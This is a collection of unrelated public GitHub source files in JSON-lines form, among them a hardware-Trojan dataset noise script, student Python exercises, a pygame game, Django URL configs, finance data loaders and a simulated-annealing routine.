noisy_signal.to_csv(output_file,header= False, index= False)\r\n\r\n\r\ndef add_noise(dir2bms_folder= 'HT_Data/AES_withTrojan_Set1/',\r\n output_folder='HT_Data/AES_withTrojan_Set5/', name_bms=['AES-T400'],\r\n number_of_samples =1000,\r\n mu = 0, sigma = 0.1, do_not_add_mu_sigma_to_name= False,\r\n folder_numbers=[1]):\r\n\r\n output_folder = _fix_the_path_for_the_os(output_folder)\r\n for folder_number in folder_numbers:\r\n for name_bm in name_bms:\r\n if do_not_add_mu_sigma_to_name:\r\n output_bm_folder = output_folder + name_bm.split('_')[0] + '_' + str(number_of_samples) + 'p' + '/'\r\n else:\r\n output_bm_folder = output_folder + name_bm.split('_')[0] + '_mu_'+str(mu) + '_sigma_'+str(sigma) +'_'+str(number_of_samples) + 'p' + '/'\r\n\r\n\r\n # For the Disabled folder\r\n if os.path.isdir(output_bm_folder):\r\n print(output_bm_folder, 'exist')\r\n continue\r\n file_names = get_list_of_files_HT(dir2bms_folder,name_bms =[name_bm], folder_numbers=folder_numbers,\r\n with_anomaly_data = False)\r\n file_names = file_names [0:number_of_samples]\r\n inner_folder_name = name_bm.split('_')[0]+'+TrojanDisabled_'+str(folder_number)\r\n output_folder_final = output_bm_folder +inner_folder_name+'/'+inner_folder_name+'/'\r\n path = Path(output_folder_final)\r\n path.mkdir(parents=True, exist_ok=True)\r\n print('Output folder: ',path)\r\n for input_file in file_names:\r\n output_file= output_folder_final +input_file.split('/')[-1]\r\n _add_noise_single_file(input_file,output_file,mu,sigma)\r\n\r\n # For the Triggered folder\r\n file_names = get_list_of_files_HT(dir2bms_folder,name_bms =[name_bm], folder_numbers=folder_numbers,\r\n with_anomaly_data = True)\r\n file_names = file_names[0:number_of_samples]\r\n inner_folder_name = name_bm.split('_')[0]+'+TrojanTriggered_'+str(folder_number)\r\n output_folder_final = output_bm_folder+inner_folder_name+'/'+inner_folder_name+'/'\r\n path = Path(output_folder_final)\r\n path.mkdir(parents=True, exist_ok=True)\r\n for input_file in file_names:\r\n output_file= output_folder_final +input_file.split('/')[-1]\r\n _add_noise_single_file(input_file,output_file,mu,sigma)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n dir2bms_folder = 'HT_Data/AES_withTrojan_Set2/'\r\n output_folder = 'HT_Data/AES_withTrojan_Set11/'\r\n\r\n dataset_name = 'AES-T500'\r\n dataset_names = [dataset_name]\r\n #\r\n # dataset_names = ['AES-T400', 'AES-T500', 'AES-T600', 'AES-T700', 'AES-T800',\r\n # 'AES-T1000', 'AES-T1100', 'AES-T1300', 'AES-T1400',\r\n # 'AES-T1600','AES-T1800', 'AES-T2000']\r\n\r\n # dataset_names = ['AES-T800+Temp25','AES-T800+Temp35','AES-T800+Temp45','AES-T800+Temp55','AES-T800+Temp65',\r\n # 'AES-T800+Temp75','AES-T800+Temp85']\r\n\r\n # for mu in [0,5.25,5.5,5.75,6,6.25,6.5,6.75,7,7.25,7.5,7.75,8,8.25,8.5,8.75,9,9.25,9.5,9.75,10]:\r\n # for sigma in [10,15,20,5,25,0, 0.2, 0.4, 0.6, 0.8, 10]:\r\n # for sigma in [10, 15, 20, 5, 25, 0, 0.2, 0.4, 0.6, 0.8,1,2,3,4,5,6,7,8,9,10]:\r\n # for sigma in [0, 0.2, 0.4, 0.6, 0.8,1]:\r\n\r\n dataset_names = ['AES-T700+SQRT2bits_1000p','AES-T700+SQRT4bits_1000p','AES-T700+SQRT8bits_1000p',\r\n 'AES-T700+SQRT16bits_1000p','AES-T700+SQRT32bits_1000p','AES-T700+SQRT64bits_1000p',\r\n 'AES-T700+SQRT128bits_1000p','AES-T700+SQRT256bits_1000p']\r\n add_noise(dir2bms_folder=dir2bms_folder,\r\n output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n mu=0, sigma=0, do_not_add_mu_sigma_to_name = True,\r\n folder_numbers=[1])\r\n\r\n # for mu in [0,0.4,0.8,1.2,1.6]:\r\n # for sigma in 
[0,0.4,0.8,1.2,1.6]:\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma, do_not_add_mu_sigma_to_name = False,\r\n # folder_numbers=[1])\r\n #\r\n # for mu in [0,0.4,0.8,1.2,1.6,0.2,0.6,1,1.4,1.8,2,2.4,2.8,3.2,3.6,4]:\r\n # for sigma in [0,0.4,0.8,1.2,1.6,0.2,0.6,1,1.4,1.8,2,2.4,2.8,3.2,3.6,4]:\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma, do_not_add_mu_sigma_to_name = False,\r\n # folder_numbers=[1])\r\n\r\n # for mu in [0]:\r\n # for sigma in [0,1,2,3,4,5,6,7,8,9,10,15,20,25]: # 1.25, 1.5,1.75, 2, 2.25, 2.5,2.75,3, 3.25, 3.5,3.75,4,4.25,4.5,\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma,\r\n # folder_numbers=[1])\r\n #\r\n # for mu in [0,1,2,3,4,5,6,7,8,9,10,15,20,25]:\r\n # for sigma in [0]: # 1.25, 1.5,1.75, 2, 2.25, 2.5,2.75,3, 3.25, 3.5,3.75,4,4.25,4.5,\r\n # add_noise(dir2bms_folder=dir2bms_folder,\r\n # output_folder=output_folder, name_bms=dataset_names, number_of_samples =1000,\r\n # mu=mu, sigma=sigma,\r\n # folder_numbers=[1])\r\n\r\n # merge_samples(dir2bms_folder, name_bms=dataset_names,\r\n # uninfected_start_range=1, uninfected_samples_no=10, infected_start_range=1,infected_samples_no=3,\r\n # ht_free_file_name=\"./combined_HT-free.csv\",\r\n # ht_infected_file_name=\"./combined_HT-infected.csv\",\r\n # two_seperate_files=False)\r\n\r\n\r\n # add_noise()\r\n\r\n","repo_name":"AICPS/HTnet","sub_path":"utils/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":14064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31310382318","text":"\n\n# Assignment 1\n# Name: Roni Jack Vituli\n\n'''\nAssignment #1\nRoni Jack Vituli \n'''\n\n\n#Question 1\n\ndef Xnor(a,b):\n '''\n Question 1\n a function that recives two parameters of the same type and apply xnor\n parameters - a and b\n Returns true or false \n '''\n if a == b:\n return True\n return False\n\ndef Digit_len(num):\n '''\n a function to help us in the assignment\n '''\n count = 0\n while(num != 0):\n num //= 10\n count += 1\n return count\n\n\ndef even_or_odd(x):\n '''a function that helped us in question2'''\n if(x % 2 == 0):\n return \"even\"\n return \"odd\"\n\n\n#Question 2\n\ndef Digits(num):\n '''\n Question 2\n Function does as in the instructions\n Parameters - num\n Return value as in the instructions\n\t'''\n if( num > 0 and Digit_len(num) < 6):\n len = Digit_len(num)\n print(len)\n sum = 0\n str = \"\"\n if (len == 1):\n sum = num\n str = \"One\"\n elif(len == 2):\n sum = num//10 + num%10\n str = \"Two\"\n elif(len == 3):\n sum = num//100 + num%10\n str = \"Three\"\n elif(len == 4):\n sum = (num//10)%10 + (num//100)%10\n str = \"Four\"\n elif(len == 5):\n sum = (num//100)%10\n str = \"Five\"\n print('{0} digits - {1}'.format(str,even_or_odd(sum)))\n\n else:\n print(\"ERROR!\")\n\n\n#Question 3\ndef GoodOrder(num):\n '''\n Question 3 \n a boolean function that returns true if all the digits of the number are odd or even and false if not\n Parameters - num(the number given)\n Return value - true or false\n'''\n if(num >= 0):\n if(num > 9):\n state = even_or_odd(num)\n num //= 10\n while(num != 0):\n new_state = even_or_odd(num)\n if (state != new_state):\n return False\n num //= 10\n return True\n print('Bad 
Number')\n return False\n\n#Question 4\ndef Figure(num):\n '''\n Question 4\n prints a triangle as orderd we checked for repetitiveness of a rule and based on that we built the function\n Parameters -num:chooses the size of the triangle\n no Return value.\n '''\n for i in range(0,num-1):\n for j in range(0, num*2+1):\n if i + j == num - 1 or j - i == num - 1:\n print(i+1, end = '')\n else:\n print(' ', end = '')\n\n print('')\n for i in range(num,0,-1):\n print(i , end = '')\n for i in range(2, num+1):\n print(i , end = '')\n\n#Question 5\ndef max(num):\n\n '''\n Question 5\n help function for question 5 its a recursive function to return the max digit\n Parameters -num \n Return value max digit from the given number\n '''\n \n if(Recu_len(num) == 1):\n return num\n digit = num % 10\n num //= 10\n if(digit > num%10):\n num //=10\n num = num*10 + digit\n return max(num)\n\ndef Recu_len(num):\n\n '''\n help function for question 5 a recursive function to check a length of a number\n '''\n \n if(num == 0):\n return 0\n return 1 + Recu_len(num//10)\n\ndef weight(num):\n return max(num) + Recu_len(num)\n\n#Question number 6\n\ndef IsPrimary(num, i = 2):\n\n '''\n Question 6\n finds if a number is a prime number with recurssion\n Parameters - num. i is for checking all the numbers\n Return value - true or false\n '''\n \n if(num == i or num == 1):\n return True\n elif(num % i == 0):\n return False\n return IsPrimary(num, i+1)\n\n\n\n\n#Question number 7\ndef reduce(num):\n\n '''\n Question 7\n reduces zeroes with recurssion\n Parameters - num\n Return value - the number without zeroes\n '''\n \n if(num == 0):\n return 0\n if(num > 0):\n if (num % 10 == 0):\n return reduce(num // 10)\n return num % 10 + reduce(num // 10) * 10\n else:\n if (num % 10 == 0):\n return reduce(num // 10)\n return (10 - num % 10)*(-1) - reduce((num // 10) + 1) * 10 * (-1)\n\n\n\n#Question number 8\n\ndef Pascal(n,m):\n\n '''\n\tQuestion 8\n the answer was based on the pascal triangle where each element depends on two elemnts before him\n\tthe function checks how much ways to choose m elements from a set with a size of n\n Parameters - n: size of set, m - number of elements\n Return value - how much ways to choose m elements from a set with a size of n\n '''\n \n if( m > n or n < 0 or m < 0):\n return -1\n\n if n == m or m == 0:\n return 1\n return Pascal(n-1, m-1) + Pascal(n-1, m)\n\n","repo_name":"RoniJackVituli/EducationProjects","sub_path":"Python/Assignment 1/Ass1.py","file_name":"Ass1.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"29000239997","text":"# test011.py\nimport sys\nimport pygame\nimport time\nimport random\nimport math\nfrom my_colours import *\nfrom game_over import *\nfrom my_player import *\nfrom my_enemy import *\nfrom my_score import *\nfrom my_mechanics import *\nfrom my_bullet import *\nfrom my_movement import *\nfrom introScreen import *\nfrom level import *\nfrom my_boss import *\n# import pygame.sprite as sprite\n\n#to initialize the pygame module\npygame.init()\n\n# To start the screen at 600X800 resolution.\nscreen = pygame.display.set_mode((800, 600))\n\n#background Image\nbackground = pygame.image.load('evening_1.jpg').convert()\n\n#Title and Icon\npygame.display.set_caption(\"Corona Strike 0.0.1\")\nicon = pygame.image.load('Code_Maniac.jpg')\npygame.display.set_icon(icon)\n\npygame.mixer.music.load('background.wav')\npygame.mixer.music.play(-1)\n\n\nstarting = start_game()\nrun = 
starting.game_intro(screen)\nif run == False:\n\tsys.exit()\n\n# need level selecting page\nmy_level = select_level()\nmode = my_level.level_intro(screen)\nprint(\"your mode is \", mode)\n#main game-loop\n\nrunning = True\n\np = my_player()\nc = my_corona_1(mode)\nfor i in range(5):\n\tc.spawn_corona(i)\n\ng = game_over()\nb = my_bullet()\ns = info_game()\nm = mechanics()\nkey = movement()\nclock = pygame.time.Clock()\n#rb = red_boss()\n\nhit = 0\nwhile running:\n\tdt = clock.tick_busy_loop(30)\n\t# Background color\n\tscreen.fill((0,0,0))\n\t# Background Image\n\tscreen.blit(background, (0,0))\n\tp.player(p.playerX, p.playerY, screen)\n\n\n\tc.corona_1(c.corona_1X, c.corona_1Y, screen)\n\t# rb.boss_draw(screen)\n\ts.my_score(screen)\n\ts.my_fps(dt, screen)\n\n\trunning = key.move(p, b, dt, screen)\n\n\t# checking game finish\n\tdead = 0\n\n\tfor i in range(5):\n\t\t\t\t\t\t\n\t\tif not c.alive[i]:\n\t\t\t\tdead += 1\n\t\t\t\tcontinue\n\t\tfor j in range(i + 1, 5):\n\t\t\tif not c.alive[j]:\n\t\t\t\tcontinue\n\t\t\telif c.corona_1Y[i] == c.corona_1Y[j]:\n\t\t\t\tif abs(c.corona_1X[i] - c.corona_1X[j]) < 48:\n\t\t\t\t# if m.isCollision(c.corona_1X[i], \n\t\t\t\t# \t\t\t\tc.corona_1Y[i], \n\t\t\t\t# \t\t\t\tc.corona_1X[j], \n\t\t\t\t# \t\t\t\tc.corona_1Y[j]\n\t\t\t\t# \t\t\t\t): \n\t\t\t\t\tc.corona_movX[i] = -c.corona_movX[i]\n\t\t\t\t\tc.corona_movX[j] = -c.corona_movX[j]\n\t\t\t\t\tif c.corona_movX[i] > 0:\n\t\t\t\t\t\tc.corona_1X[j] -= (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1X[i] += (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1_Img[j] = c.corona_1_Img_left[j]\n\t\t\t\t\t\tc.corona_1_Img[i] = c.corona_1_Img_right[i]\n\t\t\t\t\telse:\n\t\t\t\t\t\tc.corona_1X[j] += (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1X[i] -= (48 - abs(c.corona_1X[i] - c.corona_1X[j]))/2\n\t\t\t\t\t\tc.corona_1_Img[j] = c.corona_1_Img_right[j]\n\t\t\t\t\t\tc.corona_1_Img[i] = c.corona_1_Img_left[i]\n\t\t\t\t\t\t\n\t\tif m.isCollision(c.corona_1X[i], c.corona_1Y[i], b.bulletX, b.bulletY):\n\t\t\texplosion_sound = pygame.mixer.Sound('explosion.wav')\n\t\t\texplosion_sound.play()\n\t\t\tb.bullet_state = 'ready'\n\t\t\tb.bulletY = 800\n\t\t\tif mode == 5:\n\t\t\t\tc.spawn_corona(i)\n\t\t\t\ts.score += 1\n\t\t\telse:\n\t\t\t\tc.health[i] -= 1\n\t\t\t\tif c.health[i] == 0: \n\t\t\t\t\tc.alive[i] = False\n\t\t\t\t\ts.score += 1\n\t\t\tif c.corona_movX[i] < 0:\n\t\t\t\tc.corona_1_Img[i] = c.corona_1_Img_left[i]\n\t\t\t# print(s.score)\n\t\tif m.isCollision(c.corona_1X[i], c.corona_1Y[i], p.playerX, p.playerY):\n\t\t\trunning = False\n\t\t\t\t\n\tif dead == 5:\n\t\tg.win_game(screen)\n\t\tscreen.blit(background, (0,0))\n\n\t\tpygame.display.update()\n\t\trunning = False\n\n\tif not mode == 5:\n\t\tfor i in range(5):\n\t\t\tc.corona_1_Img_left[i] = pygame.image.load(c.Img_left[mode - c.health[i]])\n\t\t\tc.corona_1_Img_right[i] = pygame.image.load(c.Img_right[mode - c.health[i]])\n\n\tc.check_corona_1(dt)\n\n\t# boss collision\n\t#distance_boss = math.hypot(rb.bossX - b.bulletX, rb.bossY - b.bulletY)\n\t#if rb.health == 3:\n\t#\tif distance_boss < 120:\n\t#\t\thit = 1\n\t# elif rb.health == 2:\n\t# \tif distance_boss < 90:\n\t# \t\thit = 1\n\t# elif rb.health == 1:\n\t# \tif distance_boss < 75:\n\t# \t\thit = 1\n\t# if hit == 1:\n\t# \tb.bullet_state = 'ready'\n\t# \tb.bulletY = 800\n\t# \trb.health -= 1\n\t# \texplosion_sound = pygame.mixer.Sound('explosion.wav')\n\t# \texplosion_sound.play()\n\t# \thit = 0\n\n\t# if rb.health <= 0:\n\t# 
\texplosion_sound = pygame.mixer.Sound('explosion.wav')\n\t# \texplosion_sound.play()\n\t# \trunning = False\n\t\n\tb.check_bullet(b.bullet_state, b.bulletX, b.bulletY, screen, dt)\n\tp.check_playerX(p.playerX, p.player_movX)\n\tp.check_playerY(p.playerY)\n\t\n\tif b.bulletY <= 0:\n\t\tb.bullet_state = 'ready'\n\n\tif running == False:\n\t\tg.game_over_text(screen)\n\n\tpygame.display.update()\n","repo_name":"PrajjwalDatir/CoronaStrike","sub_path":"test011.py","file_name":"test011.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"42087237852","text":"n = int(input())\ntarget = int(input())\n\ndx = [-1, 0, 1, 0] # up, right, down, left\ndy = [0, 1, 0, -1]\n\nif n%2 == 1:\n    x, y = n//2, n//2\nelse:\n    x, y = n//2, n//2 - 1\n\ngraph = [[0] * n for _ in range(n)]\ngraph[x][y] = 1\n\ncnt = 2 # direction change\ndir = 0 # up/down/left/right\nnext_num = 2 # next number\n\nwhile True:\n    for _ in range(cnt-1):\n        nx, ny = x + dx[dir], y + dy[dir]\n        graph[nx][ny] = next_num\n        next_num += 1\n\n        if next_num == n**2 + 1:\n            break\n        x, y = nx, ny\n\n    if next_num == n**2 + 1:\n        break\n\n    dir = (dir+1)%4\n    if dir == 0 or dir == 2:\n        cnt += 1\n\nfor i in graph:\n    print(*i)\n\nfor i in range(n):\n    for j in range(n):\n        if graph[i][j] == target:\n            print(i+1, j+1)\n\n\n","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution608.py","file_name":"solution608.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"21393834600","text":"from django.conf.urls import include, url\nfrom rest_social.social.provider import (\n    FacebookLogin,\n    FacebookConnect,\n    GoogleLogin,\n    GoogleConnect,\n    GitHubLogin,\n    GitHubConnect\n)\nfrom rest_auth.registration.views import (\n    SocialAccountListView,\n    SocialAccountDisconnectView\n)\n\n\nurlpatterns = [\n    url(r'^social/facebook/$',\n        FacebookLogin.as_view(),\n        name='fb_login'),\n    url(r'^social/google/$',\n        GoogleLogin.as_view(),\n        name='google_login'),\n    url(r'^social/github/$',\n        GitHubLogin.as_view(),\n        name='github_login'),\n    url(r'^social/facebook/connect/$',\n        FacebookConnect.as_view(),\n        name='fb_connect'),\n    url(r'^social/google/connect/$',\n        GoogleConnect.as_view(),\n        name='google_connect'),\n    url(r'^social/github/connect/$',\n        GitHubConnect.as_view(),\n        name='github_connect'),\n    url(\n        r'^social/socialaccounts/$',\n        SocialAccountListView.as_view(),\n        name='social_account_list'\n    ),\n    url(\n        r'^social/socialaccounts/(?P<pk>\\d+)/disconnect/$',\n        SocialAccountDisconnectView.as_view(),\n        name='social_account_disconnect'\n    )\n]","repo_name":"francbartoli/gee-bridge","sub_path":"rest_social/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"}
{"seq_id":"70921874987","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('new', views.create_company, name='create_company'),\n path('settings', views.company_settings, name='company_settings'),\n path('savecompany', views.save_company_name),\n path('edit', views.edit_company, name='edit_company'),\n path('subscription', views.view_subscription, name='subscription'),\n path('customers', views.customer_dashboard, name='customer_dashboard'),\n path('customers/new', views.new_customer, name='new_customer'),\n path('customers/info/', views.each_customer),\n path('customers/edit/', views.edit_customer),\n path('customers/delete/', views.delete_customer),\n path('customers/download', views.download_customers, name='download_customers'),\n path('shipping-carriers', views.shipping_carriers_dashboard, name='shipping_carriers_dashboard'),\n path('shipping-carriers/new', views.new_shipping_carrier, name='new_shipping_carrier'),\n path('shipping-carriers/info/', views.each_shipping_carrier),\n path('shipping-carriers/edit/', views.edit_shipping_carrier),\n path('shipping-carriers/delete/', views.delete_shipping_carrier),\n path('shipping-carriers/download', views.download_shipping_carriers, name='download_shipping_carriers')\n]\n","repo_name":"DeveloperDaksh/Recipe_calculator","sub_path":"company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16164961393","text":"#quicksort\ndef qsort(arr, left, right):\n if (left < right):\n #divide array in two \"unequal\" parts, smaller elements on left\n pos = part(arr, left, right)\n #sort the left side recursively\n qsort(arr, left, pos - 1)\n #sort the right\n qsort(arr, pos + 1, right)\n \ndef part(arr, left, right):\n #array is unsorted, pick the rightmost element as a pivot\n #everything \"smaller\" than pivot will move to left\n pivot = arr[right]\n #sp points to last element moved\n sp = left - 1\n \n for i in range(left, right):\n if (arr[i] < pivot):\n sp += 1\n (arr[i], arr[sp]) = (arr[sp], arr[i])\n pos = sp + 1\n (arr[pos], arr[right]) = (arr[right], arr[pos])\n return pos\n ","repo_name":"jcfuhrmann/Ioss_Python","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18570929772","text":"#!/usr/bin/python\n# python script showing battery details \nimport subprocess\nimport notify2\nimport psutil \nfrom playsound import playsound\n\n# function returning time in hh:mm:ss \ndef convertTime(seconds): \n\tminutes, seconds = divmod(seconds, 60) \n\thours, minutes = divmod(minutes, 60) \n\treturn \"%d:%02d:%02d\" % (hours, minutes, seconds) \n\nclass bat_warn():\n def __init__(self):\n self.warn = False\n # returns a tuple\n self.battery = psutil.sensors_battery() \n \n def sound_play(self):\n playsound('/usr/lib/slack/resources/flitterbug.mp3')\n \n def prcnt_get(self):\n return self.battery.percent\n\n def plugged_get(self):\n return self.battery.power_plugged\n\n def note_show(self, val):\n notify2.init(\"Battery Warning\")\n n = notify2.Notification(\"Battery has reached {}%, disconnect charger!\".format(val), icon=\"\")\n n.set_urgency(notify2.URGENCY_NORMAL)\n n.set_timeout(5000)\n n.show()\n\n\ninst = bat_warn()\n\nif inst.prcnt_get()>= 80 and \\\n inst.plugged_get() == True and \\\n inst.warn == False:\n inst.sound_play()\n inst.note_show(80)\n inst.warn = True\nelse:\n if inst.plugged_get() == True: \n 
inst.warn = False\n\n print(\"percentage: {:.2f}% plugged: {}\".format(inst.prcnt_get(),inst.plugged_get()))\n","repo_name":"stdcerr/bat_shielder","sub_path":"bat_shielder.py","file_name":"bat_shielder.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17361728947","text":"from typing import List\n\nimport logging\nimport yfinance as yf\nfrom tqdm import tqdm\nimport pandas as pd\n\nfrom .base import ColumnNameHandler\n\n\ndef load_daily_returns(list_of_tickers: List[str], min_date: str, max_date: str) -> pd.DataFrame:\n \"\"\"\n Function to load daily return for the specified list of tickers and dates from Yahoo Finance.\n\n Parameters\n ----------\n list_of_tickers : List[str]\n List of tickers to load\n min_date : str\n Date to load the returns from\n max_date : str\n Date to load the return untill\n\n Returns\n -------\n pd.DataFrame\n Dataframe with ticker, Ret and Date columns\n \"\"\"\n returns_df = list()\n # Keep only one-token tickers (otherwise, will fall with error) and keep only unique\n list_of_tickers = set([t for t in list_of_tickers if len(t.split())==1])\n for t in tqdm(list_of_tickers):\n # Load stock data daily\n ticker_df = yf.download(t, min_date, max_date)\n # If no data available - skip the ticker\n if 'Adj Close' not in ticker_df or ticker_df.empty:\n logging.getLogger(__name__).info(f\"Could not load return for ticker {t}. Skipping it.\")\n continue\n \n # Calculate daily returns as a percentage change\n ticker_df.loc[:, ColumnNameHandler.ret_col] = ticker_df['Adj Close'].pct_change()\n # Remove Nan values\n ticker_df.dropna(inplace=True)\n ticker_df.reset_index(inplace=True)\n # Append ticker name as a new column\n ticker_df.loc[:, ColumnNameHandler.ticker_col] = t\n returns_df.append(ticker_df[[\n ColumnNameHandler.ticker_col, \n ColumnNameHandler.date_col, \n ColumnNameHandler.ret_col, \n ColumnNameHandler.volume_col\n ]].copy())\n if not returns_df:\n return None\n # Combine all returns together\n returns_df = pd.concat(returns_df, axis=0)\n returns_df.dropna(axis=1, inplace=True)\n returns_df.reset_index(inplace=True, drop=True)\n returns_df[ColumnNameHandler.date_col] = pd.to_datetime(returns_df[ColumnNameHandler.date_col]).dt.date\n return returns_df\n\n\ndef load_daily_factors(five_factors: bool = False) -> pd.DataFrame:\n \"\"\"\n Function to load daily factors from Fama-Franch public library.\n\n Parameters\n ----------\n five_factors : bool, optional\n Whether to load five factors or three factors instead, by default False\n\n Returns\n -------\n pd.DataFrame\n Dataframe with loaded factors per date\n \"\"\"\n website_url = \"https://mba.tuck.dartmouth.edu/pages/faculty/ken.french/ftp\"\n if five_factors:\n url_to_factors = f'{website_url}/F-F_Research_Data_5_Factors_2x3_daily_CSV.zip'\n else:\n url_to_factors = f'{website_url}/F-F_Research_Data_Factors_daily_CSV.zip'\n # First 3 rows show meta data - thus, skip it\n ff_df = pd.read_csv(url_to_factors, skiprows=3)\n # Original index is Date - thus, in the file it will be unnamed. 
Change it.\n    ff_df.rename({'Unnamed: 0': 'Date'}, axis=1, inplace=True)\n    ff_df.loc[:, 'Date'] = pd.to_datetime(ff_df['Date'].astype(str), errors='coerce').dt.date\n    # There could be a footer with metadata - make sure to drop it\n    ff_df.dropna(axis=0, inplace=True)\n    return ff_df\n","repo_name":"Darenar/easy-event-study","sub_path":"easy_es/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72517106666","text":"'''Create an algorithm to calculate the salary according to the number of hours worked'''\n'''\ndeclaring variables\n'''\ngerente = \"gerente\"\nsupervisor = \"supervisor\"\noperador= \"operador\"\nfabrica = \"fabrica\"\nescritorio = \"escritorio\"\nsalario = 0\n\nnome = input(\"Informe o nome do Funcionario : \")\ncargo = input('Informe o cargo de '+nome+' : ')\nlocal = input('Informe o local onde '+nome+' trabalha : ')\nquantHora = float(input(\"Informe a quantidade de horas trabalhadas : \"))\n\nif cargo == gerente :\n    if local == escritorio:\n        salario = quantHora * 70.00\n    else:\n        if local == fabrica:\n            salario = quantHora * 80.00\n        else:\n            print(\"O local informado é invalido\")\nelse:\n    if cargo == supervisor:\n        if local == escritorio:\n            salario = quantHora * 50.00\n        else:\n            if local == fabrica:\n                salario = quantHora * 60.00\n            else:\n                print(\"O local informado é invalido\")\n    else:\n        if cargo == operador:\n            if local == fabrica:\n                salario = quantHora * 40.00\n            else:\n                print(\"O local informado é invalido\")\n        else:\n            print(\"O cargo informado é invalido\")\nif salario != 0:\n    print(\"O salario de \", nome, \" é : \", salario)\n","repo_name":"FlavioAlvesDS/listas-de-exercicios-em-Python","sub_path":"EstruturaDeRepetição/cargoSalario.py","file_name":"cargoSalario.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72722835627","text":"from copy import deepcopy\nimport logging\nimport numpy as np\nfrom numpy.random import rand, randn\n\nfrom pog.algorithm.utils import *\nfrom pog.graph.graph import Graph\n\nfrom pog.algorithm.params import STEP_SIZE, MAX_ITER, MAX_TEMP, TEMP_COEFF, \\\n    NUM_CYCLES_EPS, NUM_CYCLES_STEP, NUM_CYCLES_TEMP, EPS_THRESH, MAX_STEP_SIZE\n\n\n# simulated annealing algorithm\ndef simulated_annealing(\n    objective,\n    sg: Graph,\n    node_id=None,\n    random_start=False,\n    verbose=False,\n    method='standard',\n):\n    \"\"\"simulated annealing algorithm to maximize stability.\n\n\t\tNOTE: This function is only for scene graph with max depth = 2\n\n\tArgs:\n\t\tobjective (list): a list of objective functions\n\t\tsg (Graph): scene graph\n\t\tnode_id (list, optional): a list of nodes to be optimized. Defaults to None.\n\t\trandom_start (bool, optional): Randomly select initial configuration. Defaults to False.\n\t\tverbose (bool, optional): More outputs. 
Defaults to False.\n\n\tReturns:\n\t\tbest: best configuration\n\t\tbest_eval: cost of best configuration\n\t\"\"\"\n if method == 'adaptive':\n return adaptive_simulated_annealing(objective,\n sg,\n node_id,\n random_start=random_start,\n verbose=verbose)\n\n if node_id is not None:\n pose = sg.getPose(edge_id=node_id)\n else:\n pose = sg.getPose()\n object_pose_dict, bounds = gen_bound(pose)\n\n # generate an initial point\n if random_start:\n best = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n else:\n best = pose2arr(pose, object_pose_dict, [])\n\n # evaluate the initial point\n best_eval, _ = objective[0](best, object_pose_dict, sg)\n # current working solution\n curr, curr_eval = best, best_eval\n\n # run the algorithm\n t = MAX_TEMP\n best_eval_arr = []\n history = []\n for i in range(MAX_ITER):\n # take a step\n step_direction = randn(len(curr)) # Gaussian\n # step_direction = 2. * (rand(len(curr)) - 0.5) # Uniform\n candidate = curr + step_direction / np.linalg.norm(\n step_direction) * STEP_SIZE\n\n # evaluate candidate point\n pose = arr2pose(candidate, object_pose_dict, pose)\n sg.setPose(pose)\n candidate_eval, _ = objective[0](candidate, object_pose_dict, sg)\n # difference between candidate and current point evaluation\n diff = candidate_eval - curr_eval\n\n # calculate temperature for current epoch\n t = t * TEMP_COEFF\n\n # calculate metropolis acceptance criterion\n metropolis = np.exp(min(-diff / t, 700.)) # <- avoid overflow\n\n # check for new best solution\n if candidate_eval < best_eval:\n # store new best point\n best, best_eval = candidate, candidate_eval\n # report progress\n if verbose:\n best_tmp = [float(\"{:.4f}\".format(x)) for x in list(best)]\n logging.debug('>{} f({}) = {:.4f}, temp: {:.4f}'.format(\n i, best_tmp, best_eval, t))\n\n best_eval_arr.append(diff)\n if len(best_eval_arr) > NUM_CYCLES_EPS and (abs(\n np.array(best_eval_arr[-NUM_CYCLES_EPS:])) <\n EPS_THRESH).all():\n break\n\n # check if we should keep the new point\n if diff < 0 or rand() < metropolis:\n # store the new current point\n curr, curr_eval = candidate, candidate_eval\n\n return best, best_eval\n\n\ndef adaptive_simulated_annealing(objective,\n sg: Graph,\n 